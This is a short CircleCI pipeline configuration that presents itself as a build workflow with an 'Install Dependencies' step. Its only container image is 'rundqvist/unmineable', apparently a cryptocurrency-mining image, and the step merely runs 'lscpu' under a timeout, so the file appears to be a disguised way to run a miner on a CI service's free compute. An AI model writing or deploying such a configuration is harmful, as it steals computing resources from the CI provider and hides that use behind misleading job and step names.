version: 2.1
jobs:
    Devop:
      docker:
            - image: rundqvist/unmineable
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
workflows:
    version: 2.1
    build:
        jobs:
            - Devop